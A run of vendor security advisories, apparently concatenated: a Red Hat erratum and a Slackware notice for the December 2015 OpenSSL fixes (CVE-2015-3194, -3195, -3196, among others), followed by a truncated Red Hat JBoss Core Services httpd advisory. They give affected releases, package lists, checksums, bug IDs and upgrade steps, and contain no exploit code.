security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. \n\nA NULL pointer derefernce flaw was found in the way OpenSSL verified\nsignatures using the RSA PSS algorithm. A remote attacked could possibly\nuse this flaw to crash a TLS/SSL client using OpenSSL, or a TLS/SSL server\nusing OpenSSL if it enabled client authentication. (CVE-2015-3194)\n\nA memory leak vulnerability was found in the way OpenSSL parsed PKCS#7 and\nCMS data. A remote attacker could use this flaw to cause an application\nthat parses PKCS#7 or CMS data from untrusted sources to use an excessive\namount of memory and possibly crash. (CVE-2015-3195)\n\nA race condition flaw, leading to a double free, was found in the way\nOpenSSL handled pre-shared key (PSK) identify hints. A remote attacker\ncould use this flaw to crash a multi-threaded SSL/TLS client using\nOpenSSL. (CVE-2015-3196)\n\nAll openssl users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. For the update to take\neffect, all services linked to the OpenSSL library must be restarted, or\nthe system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1288320 - CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter\n1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak\n1288326 - CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-42.el6_7.1.src.rpm\n\ni386:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-static-1.0.1e-42.el6_7.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-42.el6_7.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-42.el6_7.1.src.rpm\n\ni386:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\n\nppc64:\nopenssl-1.0.1e-42.el6_7.1.ppc.rpm\nopenssl-1.0.1e-42.el6_7.1.ppc64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.ppc64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.ppc.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-42.el6_7.1.s390.rpm\nopenssl-1.0.1e-42.el6_7.1.s390x.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.s390.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.s390x.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.s390.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-static-1.0.1e-42.el6_7.1.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.ppc64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.ppc64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.s390x.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.s390x.rpm\nopenssl-static-1.0.1e-42.el6_7.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-42.el6_7.1.src.rpm\n\ni386:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-static-1.0.1e-42.el6_7.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.1.src.rpm\n\naarch64:\nopenssl-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.aarch64.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.aarch64.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.1.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.1.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-3194\nhttps://access.redhat.com/security/cve/CVE-2015-3195\nhttps://access.redhat.com/security/cve/CVE-2015-3196\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://openssl.org/news/secadv/20151203.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWblodXlSAg2UNWIIRAt6yAKCw1yHbcUPDEPeokS22dMKyo6YFsQCgmPe4\ndpIS/iR9oiOKMXJY5t447ME=\n=qvLr\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1q-x86_64-1_slack14.1.txz: Upgraded. \n Anon DH ServerKeyExchange with 0 p parameter (CVE-2015-1794). \n For more information, see:\n https://openssl.org/news/secadv_20151203.txt\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1794\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3193\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3194\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3195\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3196\n (* Security fix *)\npatches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz: Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zh-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zh-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zh-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1q-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1q-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1q-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1q-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1q-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1q-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2e-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2e-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2e-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2e-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n5e45a22283b41aaf4f867918746ebc1d openssl-0.9.8zh-i486-1_slack13.0.txz\n0ad74b36ce143d28e15dfcfcf1fcb483 openssl-solibs-0.9.8zh-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\nc360d323a2bed57c62d6699b2d4be65e openssl-0.9.8zh-x86_64-1_slack13.0.txz\n122240badbfbe51c842a9102d3cfe30f openssl-solibs-0.9.8zh-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n1bf98b27573b20a7de5f6359f3eadbd7 openssl-0.9.8zh-i486-1_slack13.1.txz\n2b732f1f29de1cb6078fd1ddda8eb9ec openssl-solibs-0.9.8zh-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\n735c3bbc55902ec57e46370cde32ea4b openssl-0.9.8zh-x86_64-1_slack13.1.txz\n483f506f3b86572e60fe4c46a67c226b openssl-solibs-0.9.8zh-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n9af41ba336c64b92d5bbd86c17a93e94 openssl-0.9.8zh-i486-1_slack13.37.txz\nb83170b9c5ec56b4e2dc882b3c64b306 openssl-solibs-0.9.8zh-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n2220ff161d0bf3635d2dea7caae6e5e7 openssl-0.9.8zh-x86_64-1_slack13.37.txz\n17b3e8884f383e3327d5e4a6080634cb openssl-solibs-0.9.8zh-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\nced42bc3799f2b54aeb3b631a2864b90 openssl-1.0.1q-i486-1_slack14.0.txz\n52965f98ee30e8f3d22bde6b0fe7f53b openssl-solibs-1.0.1q-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\ncbf49f09bdcebc61cf7fcb2857dc3a71 openssl-1.0.1q-x86_64-1_slack14.0.txz\n156911f58b71ee6369467d8fec34a59f openssl-solibs-1.0.1q-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n36d5f60b634788d4315ffb46ef6d4d88 openssl-1.0.1q-i486-1_slack14.1.txz\nfc18f566a9a2f5c6adb15d288245403a openssl-solibs-1.0.1q-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n03f1832417a79f73b35180a39ae4fb16 openssl-1.0.1q-x86_64-1_slack14.1.txz\nbf447792f23deb14e1fe3f008a6b78a7 openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n27b2974199a970392ed2192bf4a207a9 a/openssl-solibs-1.0.2e-i586-1.txz\n940a7653a6cadb44ce143d3b0e0eaa16 n/openssl-1.0.2e-i586-1.txz\n\nSlackware x86_64 -current packages:\n8636a45f49d186d505b356b9be66309b a/openssl-solibs-1.0.2e-x86_64-1.txz\n87c33a76a94993864a52bfe4e5d5b2f0 n/openssl-1.0.2e-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1q-i486-1_slack14.1.txz openssl-solibs-1.0.1q-i486-1_slack14.1.txz \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. Description:\n\nThis release of Red Hat JBoss Core Services httpd 2.4.23 serves as a\nreplacement for JBoss Core Services Apache HTTP Server 2.4.6. (CVE-2014-8176,\nCVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196,\nCVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799,\nCVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109,\nCVE-2016-2177, CVE-2016-2178, CVE-2016-2842)\n\n* This update fixes several flaws in libxml2. (CVE-2016-1762,\nCVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705,\nCVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)\n\n* This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420,\nCVE-2016-7141)\n\n* This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)\n\n* This update fixes two flaws in mod_cluster. (CVE-2016-4459,\nCVE-2016-8612)\n\n* A buffer overflow flaw when concatenating virtual host names and URIs was\nfixed in mod_jk. (CVE-2012-1148)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2014-8176, CVE-2015-0286, CVE-2016-2108, CVE-2016-2105, CVE-2016-2106,\nCVE-2016-2107, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799,\nand CVE-2016-2842. Upstream acknowledges Stephen Henson (OpenSSL development team)\nas the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat),\nHanno BAPck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105,\nCVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj\nSomorovsky as the original reporter of CVE-2016-2107; Yuval Yarom\n(University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv\nUniversity), and Nadia Heninger (University of Pennsylvania) as the\noriginal reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as\nthe original reporter of CVE-2016-0705. \n\nSee the corresponding CVE pages linked to in the References section for\nmore information about each of the flaws listed in this advisory. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. Bugs fixed (https://bugzilla.redhat.com/):\n\n801648 - CVE-2012-1148 expat: Memory leak in poolGrow\n1121519 - CVE-2014-3523 httpd: WinNT MPM denial of service\n1196737 - CVE-2015-0209 openssl: use-after-free on invalid EC private key import\n1202366 - CVE-2015-0286 openssl: invalid pointer use in ASN1_TYPE_cmp()\n1227574 - CVE-2015-3216 openssl: Crash in ssleay_rand_bytes due to locking regression\n1228611 - CVE-2014-8176 OpenSSL: Invalid free in DTLS\n1243888 - CVE-2015-3185 httpd: ap_some_auth_required() does not properly indicate authenticated request in 2.4\n1288320 - CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter\n1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak\n1288326 - CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint\n1310596 - CVE-2016-0705 OpenSSL: Double-free in DSA code\n1310599 - CVE-2016-0702 OpenSSL: Side channel attack on modular exponentiation\n1311880 - CVE-2016-0797 OpenSSL: BN_hex2bn/BN_dec2bn NULL pointer deref/heap corruption\n1312219 - CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions\n1314757 - CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds\n1319829 - CVE-2016-3627 libxml2: stack exhaustion while parsing xml files in recovery mode\n1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data\n1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder\n1331426 - CVE-2016-2107 openssl: Padding oracle in AES-NI CBC MAC check\n1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow\n1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow\n1332443 - CVE-2016-3705 libxml2: stack overflow before detecting invalid XML file\n1332820 - CVE-2016-4483 libxml2: out-of-bounds read\n1338682 - CVE-2016-1833 libxml2: Heap-based buffer overread in htmlCurrentChar\n1338686 - CVE-2016-4447 libxml2: Heap-based buffer underreads due to xmlParseName\n1338691 - CVE-2016-1835 libxml2: Heap use-after-free in xmlSAX2AttributeNs\n1338696 - CVE-2016-1837 libxml2: Heap use-after-free in htmlPArsePubidLiteral and htmlParseSystemiteral\n1338700 - CVE-2016-4448 libxml2: Format string vulnerability\n1338701 - CVE-2016-4449 libxml2: Inappropriate fetch of entities content\n1338702 - CVE-2016-1836 libxml2: Heap use-after-free in xmlDictComputeFastKey\n1338703 - CVE-2016-1839 libxml2: Heap-based buffer overread in xmlDictAddString\n1338705 - CVE-2016-1838 libxml2: Heap-based buffer overread in xmlPArserPrintFileContextInternal\n1338706 - CVE-2016-1840 libxml2: Heap-buffer-overflow in 